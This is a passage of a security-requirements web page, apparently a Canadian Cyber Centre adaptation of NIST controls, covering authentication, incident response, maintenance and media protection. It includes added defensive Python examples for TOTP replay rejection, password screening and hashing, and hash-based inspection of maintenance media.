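            step = current + drift
            # Constant-time comparison so response time does not leak matching digits.
            if hmac.compare_digest(hotp(self.secret, step), code):
                if step <= self.last_step.get(user, -1):
                    return False, "replay: a code for this time step was already used"
                self.last_step[user] = step
                return True, f"accepted (drift {drift:+d} step)"
        return False, "invalid code"


# RFC 6238 test-vector secret; constructed demo value only.
DEMO_SECRET = b"12345678901234567890"


def demo():
    """Acceptance, replay rejection and expiry for a fixed clock (user name assumed)."""
    v = TotpVerifier(DEMO_SECRET)
    t0 = 1_111_111_109                      # RFC 6238 test time; SHA-1 code is 081804
    code = totp(DEMO_SECRET, t0)
    first = v.verify("alice", code, now=t0)[0]
    replay = v.verify("alice", code, now=t0 + 1)[0]        # still inside the window
    late = v.verify("alice", code, now=t0 + 3 * STEP)[0]   # outside the window
    return first, replay, late


if __name__ == "__main__":
    print(totp(DEMO_SECRET, 1_111_111_109), demo())  # 081804 (True, False, False)
```

<p>The window size is the "validation time window for time synchronous one-time tokens" that <a href="#03-05-12">Authenticator management 03.05.12</a> lists as an organization-defined setting; widening it tolerates more clock drift but also lengthens the period in which a stolen code is usable, which is why the verifier pairs it with the last-used-step record.</p> <p>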
In addition to authenticating users at the system level, organizations may also employ authentication mechanisms at the application level to provide increased information security.</p> <h5>References</h5> <p>Source controls: IA-02(01), IA-02(02)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-04">03.05.04 Replay-resistant authentication</h4> </summary><p>Implement replay-resistant authentication mechanisms for access to privileged and non-privileged accounts.</p> <h5>Discussion</h5> <p>Authentication processes resist replay attacks if it is impractical to successfully authenticate by recording or replaying previous authentication messages. Replay-resistant techniques include protocols that use nonces or challenges, such as time synchronous or challenge-response one-time authenticators.</p> <h5>References</h5> <p>Source control: IA-02(08)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-05">03.05.05 Identifier management</h4> </summary><ol class="lst-upr-alph"><li>Receive authorization from organizational personnel or roles to assign an individual, group, role, service, or device identifier</li> <li>Select and assign an identifier that identifies an individual, group, role, service, or device</li> <li>Prevent reuse of identifiers for [Assignment: organization-defined time period]</li> <li>Manage individual identifiers by uniquely identifying each individual as [Assignment: organization-defined characteristic identifying individual status]</li> </ol><h5>Discussion</h5> <p>Identifiers are provided for users, processes acting on behalf of 
users, and devices. Prohibiting the reuse of identifiers prevents the assignment of previously used individual, group, role, service, or device identifiers to different individuals, groups, roles, services, or devices.</p> <p>Characteristics that identify the status of individuals include contractors, foreign nationals, and non-organizational users. Identifying the status of individuals by these characteristics provides information about the people with whom organizational personnel are communicating. For example, it is useful for an employee to know that one of the individuals on an email message is a contractor.</p> <h5>References</h5> <p>Source controls: IA-04, IA-04(04)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><h4 id="03-05-06">03.05.06 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-05-07">03.05.07 Password management</h4> </summary><ol class="lst-upr-alph"><li>Maintain a list of commonly used, expected, or compromised passwords and update the list [Assignment: organization-defined frequency] and when organizational passwords are suspected to have been compromised</li> <li>Verify that passwords are not found on the list of commonly used, expected, or compromised passwords when users create or update passwords</li> <li>Transmit passwords only over cryptographically protected channels</li> <li>Store passwords in a cryptographically protected form</li> <li>Select a new password upon first use after account recovery</li> <li>Enforce the following composition and complexity rules for passwords: [Assignment: organization-defined composition and complexity rules]</li> </ol><h5>Discussion</h5> <p>Password-based authentication applies to passwords used in single-factor or multi-factor 
authentication. Long passwords or passphrases are preferable to shorter passwords. Enforced composition rules provide marginal security benefits while decreasing usability. However, organizations may choose to establish and enforce certain rules for password generation (e.g., minimum character length) under certain circumstances. Account recovery can occur, for example, when a password is forgotten. Cryptographically protected passwords include salted one-way cryptographic hashes of passwords. The list of commonly used, compromised, or expected passwords includes passwords obtained from previous breach corpuses, dictionary words, and repetitive or sequential characters. The list includes context-specific words, such as the name of the service, username, and derivatives thereof. Changing temporary passwords to permanent passwords immediately after system logon ensures that the necessary strength of the authentication mechanism is implemented at the earliest opportunity and reduces the susceptibility to authenticator compromises. 
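</p> <p>As an added example for items a, b, d and f (not code from this publication or from NIST), the Python below screens a candidate password against a blocklist, against the service name and username that the discussion calls context-specific words, and against repetitive or sequential runs, then stores an accepted password as a salted, iterated PBKDF2-HMAC-SHA256 hash. The breach list, the service name <code>waterworks-scada</code>, the 12-character minimum and the iteration count are constructed values for the example; a real list comes from breach corpora and is refreshed on the organization-defined schedule.</p>

```python
"""Password screening against a blocklist, plus salted iterated storage.

Added example for 03.05.07 items a, b, d and f; not Cyber Centre or NIST code.
The breach list, service name and thresholds below are constructed sample data.
"""
import hashlib
import hmac
import os
import re

# Constructed sample of a "commonly used, expected, or compromised" list (lowercase).
BREACHED = {"password", "123456", "qwerty123", "letmein", "welcome1", "summer2024"}

MIN_LENGTH = 12                 # assumed organization-defined rule: length, not composition
PBKDF2_ITERATIONS = 100_000     # kept modest for the demo; raise for production
SERVICE_NAME = "waterworks-scada"   # constructed context word for the service

# Common substitutions, so 'P@ssw0rd!' is still caught by the entry 'password'.
LEET = str.maketrans("@$0345", "asoeas")


def _variants(s):
    """Lowercase, stripped and de-leeted forms of a candidate, for list lookup."""
    low = s.lower()
    stripped = re.sub(r"[^a-z0-9]", "", low)
    leet = re.sub(r"[^a-z0-9]", "", low.translate(LEET))
    return {low, stripped, leet}


def _is_repetitive_or_sequential(pw, run=4):
    """Flag runs such as 'aaaa', '1234' or 'dcba' of length `run`."""
    if re.search(r"(.)\1{%d,}" % (run - 1), pw):
        return True
    codes = [ord(c) for c in pw.lower()]
    for i in range(len(codes) - run + 1):
        diffs = {codes[j + 1] - codes[j] for j in range(i, i + run - 1)}
        if diffs == {1} or diffs == {-1}:
            return True
    return False


def screen_password(candidate, username, breached=BREACHED, service=SERVICE_NAME):
    """Return the reasons a candidate is rejected; an empty list means acceptable."""
    reasons = []
    if len(candidate) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    variants = _variants(candidate)
    if variants & breached:
        reasons.append("appears on the compromised/common password list")
    # Context-specific words: username, service name and its components.
    for word in (username, service) + tuple(service.split("-")):
        w = re.sub(r"[^a-z0-9]", "", word.lower())
        if len(w) >= 3 and any(w in v for v in variants):
            reasons.append(f"contains context-specific word '{word}'")
            break
    if _is_repetitive_or_sequential(candidate):
        reasons.append("contains a repetitive or sequential run")
    return reasons


def hash_password(password, salt=None):
    """Store as algorithm$iterations$salt$hash. A random per-user salt means the
    same password never produces the same record and defeats precomputed tables."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for pw in ("P@ssw0rd!", "Summer2024!!", "WaterWorks-Scada-2025", "correct horse battery staple"):
        print(f"{pw!r}: {screen_password(pw, 'alice') or 'acceptable'}")
```

<p>Screening normalizes the candidate before the lookup, so <code>P@ssw0rd!</code> is caught by the entry for <code>password</code> and <code>Summer2024!!</code> by <code>summer2024</code>; this is the "derivatives thereof" in the discussion. The stored record carries the algorithm and iteration count so they can be raised later without breaking verification of older records.</p> <p>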
Long passwords and passphrases can be used to increase the complexity of passwords.</p> <h5>References</h5> <p>Source control: IA-05(01)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><h4 id="03-05-08">03.05.08 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-05-09">03.05.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-05-10">03.05.10 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-05-11">03.05.11 Authentication feedback</h4> </summary><p>Obscure feedback of authentication information during the authentication process.</p> <h5>Discussion</h5> <p>Authentication feedback does not provide information that would allow unauthorized individuals to compromise authentication mechanisms. For example, for desktop or notebook computers with relatively large monitors, the threat may be significant (commonly referred to as shoulder surfing). For mobile devices with small displays, this threat may be less significant and is balanced against the increased likelihood of input errors due to small keyboards. Therefore, the means for obscuring the authentication feedback is selected accordingly. 
Obscuring feedback includes displaying asterisks when users type passwords into input devices or displaying feedback for a limited time before fully obscuring it.</p> <h5>References</h5> <p>Source control: IA-06<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-05-12">03.05.12 Authenticator management</h4> </summary><ol class="lst-upr-alph"><li>Verify the identity of the individual, group, role, service, or device receiving the authenticator as part of the initial authenticator distribution</li> <li>Establish initial authenticator content for any authenticators issued by the organization</li> <li>Establish and implement administrative procedures for initial authenticator distribution, for lost, compromised, or damaged authenticators, and for revoking authenticators</li> <li>Change default authenticators at first use</li> <li>Change or refresh authenticators [Assignment: organization-defined frequency] or when the following events occur: [Assignment: organization-defined events]</li> <li>Protect authenticator content from unauthorized disclosure and modification</li> </ol><h5>Discussion</h5> <p>Authenticators include passwords, cryptographic devices, biometrics, certificates, one-time password devices, and ID badges. The initial authenticator content is the actual content of the authenticator (e.g., the initial password). In contrast, requirements for authenticator content contain specific characteristics. 
Authenticator management is supported by organization-defined settings and restrictions for various authenticator characteristics (e.g., password complexity and composition rules, validation time window for time synchronous one-time tokens, and the number of allowed rejections during the verification stage of biometric authentication).</p> <p>The requirement to protect individual authenticators may be implemented by <a href="#03-15-03">Rules of behaviour 03.15.03</a> for authenticators in the possession of individuals and by <a href="#03-01-01">Account management 03.01.01</a>, <a href="#03-01-02">Access enforcement 03.01.02</a>, <a href="#03-01-05">Least privilege 03.01.05</a>, and <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a> for authenticators stored in organizational systems. This includes passwords stored in hashed or encrypted formats or files that contain encrypted or hashed passwords accessible with administrator privileges. Actions can be taken to protect authenticators, including maintaining possession of authenticators, not sharing authenticators with others, and immediately reporting lost, stolen, or compromised authenticators.</p> <p>Developers may deliver system components with factory default authentication credentials to allow for initial installation and configuration. Default authentication credentials are often well-known, easily discoverable, and present a significant risk. Authenticator management includes issuing and revoking authenticators for temporary access when no longer needed. 
The use of long passwords or passphrases may obviate the need to periodically change authenticators.</p> <h5>References</h5> <p>Source control: IA-05<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-6">3.6 Incident response</h3> <p>The Incident response controls support the establishment of an operational incident handling capability for organizational systems that includes adequate preparation, monitoring, detection, analysis, containment, recovery, and response. Incidents are monitored, documented, and reported to appropriate organizational officials and authorities.</p> <details><summary><h4 id="03-06-01">03.06.01 Incident handling</h4> </summary><p>Implement an incident-handling capability that is consistent with the incident response plan and includes preparation, detection and analysis, containment, eradication, and recovery</p> <h5>Discussion</h5> <p>Incident-related information can be obtained from a variety of sources, including audit monitoring, network monitoring, physical access monitoring, user and administrator reports, 
and reported supply chain events. An effective incident handling capability involves coordination among many organizational entities, including mission and business owners, system owners, human resources offices, physical and personnel security offices, legal departments, operations personnel, and procurement offices.</p> <p>An incident that involves personal information is considered a privacy breach. A privacy breach results in the loss of control, compromise, unauthorized disclosure, unpermitted use, unlawful collection, improper retention or disposal, or a similar occurrence in which a person other than an authorized user accesses or potentially accesses such information, or an authorized user accesses or potentially accesses it for other than authorized purposes.</p> <p>If the incident involves the breach of personal information, notification to the contract owner is mandatory.</p> <h5>References</h5> <p>Source control: IR-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-06-02">03.06.02 Incident monitoring, reporting, and response assistance</h4> </summary><ol class="lst-upr-alph"><li>Track and document system security incidents</li> <li>Report suspected incidents to the organizational incident response capability within [Assignment: organization-defined time period]</li> <li>Report incident information to [Assignment: organization-defined authorities]</li> <li>Provide an incident response support resource that offers advice and assistance to system users for the handling and reporting of 
incidents</li> </ol><h5>Discussion</h5> <p>Documenting incidents includes maintaining records about each incident, the status of the incident, and other pertinent information necessary for forensics as well as evaluating incident details, trends, and handling. Incident information can be obtained from many sources, including network monitoring, incident reports, incident response teams, user complaints, supply chain partners, audit monitoring, physical access monitoring, and user and administrator reports. <a href="#03-06-01">Incident handling 03.06.01</a> provides information on the types of incidents that are appropriate for monitoring. The types of incidents reported, the content and timeliness of the reports, and the reporting authorities reflect applicable laws, jurisprudence, Orders in Council, directives, regulations, policies, standards, and guidelines. Incident information informs risk assessments, the effectiveness of security and privacy assessments, the security requirements for acquisitions, and the selection criteria for technology products. 
Incident response support resources provided by organizations include help desks, assistance groups, automated ticketing systems to open and track incident response tickets, and access to forensic services or consumer redress services, when required.</p> <h5>References</h5> <p>Source controls: IR-05, IR-06, IR-07<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response</a></li> <li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003)</a></li> </ul></details><details><summary><h4 id="03-06-03">03.06.03 Incident response testing</h4> </summary><p>Test the effectiveness of the incident response capability [Assignment: organization-defined frequency].</p> <h5>Discussion</h5> <p>Organizations test incident response capabilities to determine their effectiveness and identify potential weaknesses or deficiencies. Incident response testing includes the use of checklists, walk-through or tabletop exercises, and simulations. Incident response testing can include a determination of the effects of incident response on organizational operations, organizational assets, and individuals. 
Qualitative and quantitative data can help determine the effectiveness of incident response processes.</p> <h5>References</h5> <p>Source control: IR-03<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/84/final">NIST SP 800-84 Guide to Test, Training, and Exercise Programs for <abbr title="information technology">IT</abbr> Plans and Capabilities</a></p> </details><details><summary><h4 id="03-06-04">03.06.04 Incident response training</h4> </summary><ol class="lst-upr-alph"><li>Provide incident response training to system users consistent with assigned roles and responsibilities: <ol><li>within [Assignment: organization-defined time period] of assuming an incident response role or responsibility or acquiring system access</li> <li>when required by system changes</li> <li>[Assignment: organization-defined frequency] thereafter</li> </ol></li> <li>Review and update incident response training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Incident response training is associated with the assigned roles and responsibilities of organizational personnel to ensure that the appropriate content and level of detail are included in such training. For example, users may only need to know whom to call or how to recognize an incident; system administrators may require additional training on how to handle incidents; and incident responders may receive specific training on forensics, data collection techniques, reporting, system recovery, and system restoration. Incident response training includes user training in identifying and reporting suspicious activities from external and internal sources. Incident response training for users may be provided as part of <a href="#03-02-02">Role-based training 03.02.02</a>. 
Events that may cause an update to incident response training content include incident response plan testing, response to an actual incident, audit or assessment findings, or changes in applicable laws, jurisprudence, Orders in Council, policies, directives, regulations, standards, and guidelines.</p> <h5>References</h5> <p>Source control: IR-02<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM)</a></li> </ul></details><details><summary><h4 id="03-06-05">03.06.05 Incident response plan</h4> </summary><ol class="lst-upr-alph"><li>Develop an incident response plan that: <ol><li>provides the organization with a roadmap for implementing its incident response capability</li> <li>describes the structure and organization of the incident response capability</li> <li>provides a high-level approach for how the incident response capability fits into the overall organization</li> <li>defines reportable incidents</li> <li>addresses the sharing of incident information</li> <li>designates responsibilities to organizational entities, personnel, or roles</li> </ol></li> <li>Distribute copies of the incident response plan to designated incident response personnel (identified by name and/or by role) and organizational elements</li> <li>Update the incident response plan to address system and organizational changes or problems encountered during plan implementation, execution, or testing</li> <li>Protect the incident response plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>It is important that organizations develop and implement a coordinated approach to incident response. Organizational mission and business functions determine the structure of incident response capabilities. 
As part of the incident response capabilities, organizations consider the coordination and sharing of information with external organizations, including external service providers and other organizations involved in the supply chain.</p> <h5>References</h5> <p>Source control: IR-08<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003) </a></li> <li><a href="https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/dvlpng-ndnt-rspns-pln/index-en.aspx">Public Safety Canada Developing an Operational Technology and Information Technology Incident Response Plan </a></li> <li><a href="https://laws-lois.justice.gc.ca/eng/regulations/SOR-2018-64/index.html">Breach of Security Safeguards Regulations SOR/2018-64 </a></li> </ul></details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-7">3.7 Maintenance</h3> <p>The Maintenance controls support periodic and timely maintenance on organizational systems and provide effective controls on the tools, techniques, mechanisms, and personnel used to conduct system maintenance to ensure its ongoing availability.</p> <h4 id="03-07-01">03.07.01 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards 
and Technology">NIST</abbr>.</p> <h4 id="03-07-02">03.07.02 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-07-03">03.07.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-07-04">03.07.04 Maintenance tools</h4> </summary><ol class="lst-upr-alph"><li>Approve, control, and monitor the use of system maintenance tools</li> <li>Check media containing diagnostic and test programs for malicious code before the media are used in the system</li> <li>Prevent the removal of system maintenance equipment containing specified information by verifying that there is no specified information on the equipment, sanitizing or destroying the equipment, or retaining the equipment within the facility</li> </ol><h5>Discussion</h5> <p>Approving, controlling, monitoring, and reviewing maintenance tools address security-related issues associated with the tools that are used for diagnostic and repair actions on the system. Maintenance tools can include hardware and software diagnostic and test equipment as well as packet sniffers. The tools may be pre-installed, brought in with maintenance personnel on media, cloud-based, or downloaded from a website. Diagnostic and test programs are potential vehicles for transporting malicious code into the system, either intentionally or unintentionally. Examples of media inspection include checking the cryptographic hash or digital signatures of diagnostic and test programs and media.</p> <p>If organizations inspect media that contain diagnostic and test programs and determine that the media also contains malicious code, the incident is handled consistent with incident handling policies and procedures. A periodic review of maintenance tools can result in the withdrawal of approval for outdated, unsupported, irrelevant, or no-longer-used tools. 
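</p> <p>Inspecting the diagnostic and test programs on maintenance media by cryptographic hash before the media are used, as an added example (it is not the Cyber Centre's code): the approved-tools manifest, file names and media contents are constructed, and the manifest itself is assumed to be integrity-protected elsewhere.</p>

```python
"""Media inspection before use (03.07.04): compare the diagnostic and test
programs found on maintenance media against an approved-tools manifest of
SHA-256 hashes. Added example, not the Cyber Centre's code; the manifest,
file names and media contents below are constructed."""
import hashlib
import hmac
import os
import tempfile
from dataclasses import dataclass, field


@dataclass
class MediaInspection:
    approved: list = field(default_factory=list)    # name and hash match the manifest
    modified: list = field(default_factory=list)    # name known, hash differs
    unapproved: list = field(default_factory=list)  # program not in the manifest at all
    missing: list = field(default_factory=list)     # approved program absent from media

    def media_may_be_used(self) -> bool:
        # A modified or unapproved program fails inspection and is handled as an
        # incident (03.07.04 discussion); a missing approved tool is reported only.
        return not self.modified and not self.unapproved


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_media(mount_point: str, manifest: dict) -> MediaInspection:
    """manifest maps a media-relative path to the approved SHA-256 hex digest.
    The manifest is assumed to be integrity-protected (e.g. signed) elsewhere."""
    result = MediaInspection()
    seen = set()
    for root, _dirs, files in os.walk(mount_point):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, mount_point).replace(os.sep, "/")
            seen.add(rel)
            expected = manifest.get(rel)
            if expected is None:
                result.unapproved.append(rel)
            elif hmac.compare_digest(sha256_file(path), expected):
                result.approved.append(rel)
            else:
                result.modified.append(rel)
    result.missing = sorted(set(manifest) - seen)
    for bucket in (result.approved, result.modified, result.unapproved):
        bucket.sort()
    return result


def demo() -> MediaInspection:
    """Build constructed maintenance media with one good, one altered and one
    unlisted program, and a manifest that also lists a tool not on the media."""
    good = {
        "diag/memtest.bin": b"approved memory test program, build 7",
        "diag/nic-loopback.sh": b"#!/bin/sh\necho loopback ok\n",
    }
    manifest = {rel: hashlib.sha256(data).hexdigest() for rel, data in good.items()}
    manifest["diag/fw-check.bin"] = hashlib.sha256(b"approved firmware checker").hexdigest()
    with tempfile.TemporaryDirectory() as media:
        for rel, data in good.items():
            os.makedirs(os.path.join(media, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(media, rel), "wb") as f:
                f.write(data)
        # The memory test program on this media differs from the approved build.
        with open(os.path.join(media, "diag/memtest.bin"), "ab") as f:
            f.write(b" (altered)")
        # A program nobody approved was also copied onto the media.
        os.makedirs(os.path.join(media, "tools"), exist_ok=True)
        with open(os.path.join(media, "tools/extra.bin"), "wb") as f:
            f.write(b"unlisted utility")
        return inspect_media(media, manifest)


if __name__ == "__main__":
    r = demo()
    print("approved:", r.approved, "modified:", r.modified,
          "unapproved:", r.unapproved, "missing:", r.missing)
    print("media may be used:", r.media_may_be_used())
```

<p>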
Maintenance tools do not address the hardware and software components that support maintenance and are considered a part of the system.</p> <h5>References</h5> <p>Source controls: MA-03, MA-03(01), MA-03(02), MA-03(03)<br /> Supporting publications: <a href="https://www.cyber.gc.ca/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006)</a></p> </details><details><summary><h4 id="03-07-05">03.07.05 Non-local maintenance</h4> </summary><ol class="lst-upr-alph"><li>Approve and monitor non-local maintenance and diagnostic activities.</li> <li>Implement multi-factor authentication and replay resistance in the establishment of non-local maintenance and diagnostic sessions.</li> <li>Terminate session and network connections when non-local maintenance is completed.</li> </ol><h5>Discussion</h5> <p>Non-local maintenance and diagnostic activities are conducted by individuals who communicate through an external or internal network. Local maintenance and diagnostic activities are carried out by individuals who are physically present at the system location and not communicating across a network connection. 
Authentication techniques used to establish non-local maintenance and diagnostic sessions reflect the requirements in <a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a>.</p> <h5>References</h5> <p>Source control: MA-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> <li><a href="/en/identity-credential-and-access-management-icam-itsap30018">Cyber Centre Identity, Credential, and Access Management (ICAM) (ITSAP.30.018) </a></li> </ul></details><details><summary><h4 id="03-07-06">03.07.06 Maintenance personnel</h4> </summary><ol class="lst-upr-alph"><li>Establish a process for maintenance personnel authorization</li> <li>Maintain a list of authorized maintenance organizations or personnel</li> <li>Verify that non-escorted personnel who perform maintenance on the system possess the required access authorizations</li> <li>Designate organizational personnel with required access authorizations and technical competence to supervise the maintenance activities of personnel who do not possess the required access authorizations</li> </ol><h5>Discussion</h5> <p>Maintenance personnel refers to individuals who perform hardware or software maintenance on the system, while <a href="#03-10-01">Physical access authorizations 03.10.01</a> addresses physical access for individuals whose maintenance duties place them within the physical protection perimeter of the system. The technical competence of supervising individuals relates to the maintenance performed on the system, while having required access authorizations refers to maintenance on and near the system. 
Individuals who have not been previously identified as authorized maintenance personnel (e.g., manufacturers, consultants, systems integrators, and vendors) may require privileged access to the system, such as when they are required to conduct maintenance with little or no notice. Organizations may choose to issue temporary credentials to these individuals based on their risk assessments. Temporary credentials may be for one-time use or for very limited time periods.</p> <h5>References</h5> <p>Source control: MA-05<br /> Supporting publications: None</p> </details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-8">3.8 Media protection</h3> <p>Physically control and securely store system media containing <abbr title="controlled information">CI</abbr>.</p> <details><summary><h4 id="03-08-01">03.08.01 Media storage</h4> </summary><p>Physically control and securely store system media containing specified information.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. 
Digital media includes diskettes, flash drives, magnetic tapes, external or removable solid state or magnetic drives, compact discs, and digital versatile discs. Non-digital media includes paper and microfilm. Physically controlling stored media includes conducting inventories, establishing procedures to allow individuals to check out and return media to libraries, and maintaining accountability for stored media. Secure storage includes a locked drawer, desk, or cabinet or a controlled media library. Controlled areas provide physical and procedural controls to meet the requirements established for protecting information and systems. Sanitization techniques (e.g., cryptographically erasing, destroying, clearing, and purging) prevent the disclosure of specified information to unauthorized individuals. The sanitization process removes specified information from media such that the information cannot be retrieved or reconstructed.</p> <h5>References</h5> <p>Source control: MP-04<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> </ul></details><details><summary><h4 id="03-08-02">03.08.02 Media access</h4> </summary><p>Restrict access to specified information on system media to authorized personnel or roles.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. Access to specified information on system media can be restricted by physically controlling such media. This includes conducting inventories, ensuring that procedures are in place to allow individuals to check out and return media to the media library, and maintaining accountability for stored media. For digital media, access to specified information can be restricted by using cryptographic means. 
Encrypting data in storage or at rest is addressed in <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a>.</p> <h5>References</h5> <p>Source control: MP-02<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><details><summary><h4 id="03-08-03">03.08.03 Media sanitization</h4> </summary><p>Sanitize system media containing specified information prior to disposal, release out of organizational control, or release for reuse.</p> <h5>Discussion</h5> <p>Media sanitization applies to digital and non-digital media subject to disposal or reuse, whether or not the media are considered removable. Examples include digital media in scanners, copiers, printers, notebook computers, workstations, mobile devices, network components, and non-digital media. The sanitization process removes specified information from media such that the information cannot be retrieved or reconstructed. Sanitization techniques (e.g., cryptographically erasing, clearing, purging, and destroying) prevent the disclosure of specified information to unauthorized individuals when such media is reused or released for disposal. 
Cyber Centre and <abbr title="Royal Canadian Mounted Police">RCMP</abbr> endorsed standards control the sanitization process for media containing specified information and may require destruction when other methods cannot be applied to the media.</p> <h5>References</h5> <p>Source control: MP-06<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> <li><a href="https://www.rcmp-grc.gc.ca/physec-secmat/res-lim/pubs/seg/html/home_e.htm"><abbr title="Royal Canadian Mounted Police">RCMP</abbr> G1-001 Security Equipment Guide (restricted to <abbr title="Government of Canada">GC</abbr>)</a></li> </ul></details><details><summary><h4 id="03-08-04">03.08.04 Media marking</h4> </summary><p>Mark system media containing specified information to indicate distribution limitations, handling caveats, and applicable specified information markings.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. Marking refers to the use or application of human-readable security attributes. Labeling refers to the use of security attributes for internal system data structures. Digital media includes diskettes, magnetic tapes, external or removable solid state or magnetic drives, flash drives, compact discs, and digital versatile discs. Non-digital media includes paper and microfilm. 
Specified information includes any information, other than classified, that a <abbr title="Government of Canada">GC</abbr> authority identifies and qualifies in a contract as requiring safeguarding.</p> <h5>References</h5> <p>Source control: MP-03<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-08-05">03.08.05 Media transport</h4> </summary><ol class="lst-upr-alph"><li>Protect and control system media that contain specified information during transport outside of controlled areas</li> <li>Maintain accountability of system media that contain specified information during transport outside of controlled areas</li> <li>Document activities associated with the transport of system media that contain specified information</li> </ol><h5>Discussion</h5> <p>System media includes digital and non-digital media. Digital media includes flash drives, diskettes, magnetic tapes, external or removable solid state or magnetic drives, compact discs, and digital versatile discs. Non-digital media includes microfilm and paper. Controlled areas are spaces for which organizations provide physical or procedural measures to meet the requirements established for protecting specified information and systems. Media protection during transport can include cryptography and/or locked containers. Activities associated with media transport include releasing media for transport, ensuring that media enter the appropriate transport processes, and the actual transport. Authorized transport and courier personnel may include individuals external to the organization. Maintaining accountability of media during transport includes restricting transport activities to authorized personnel and tracking or 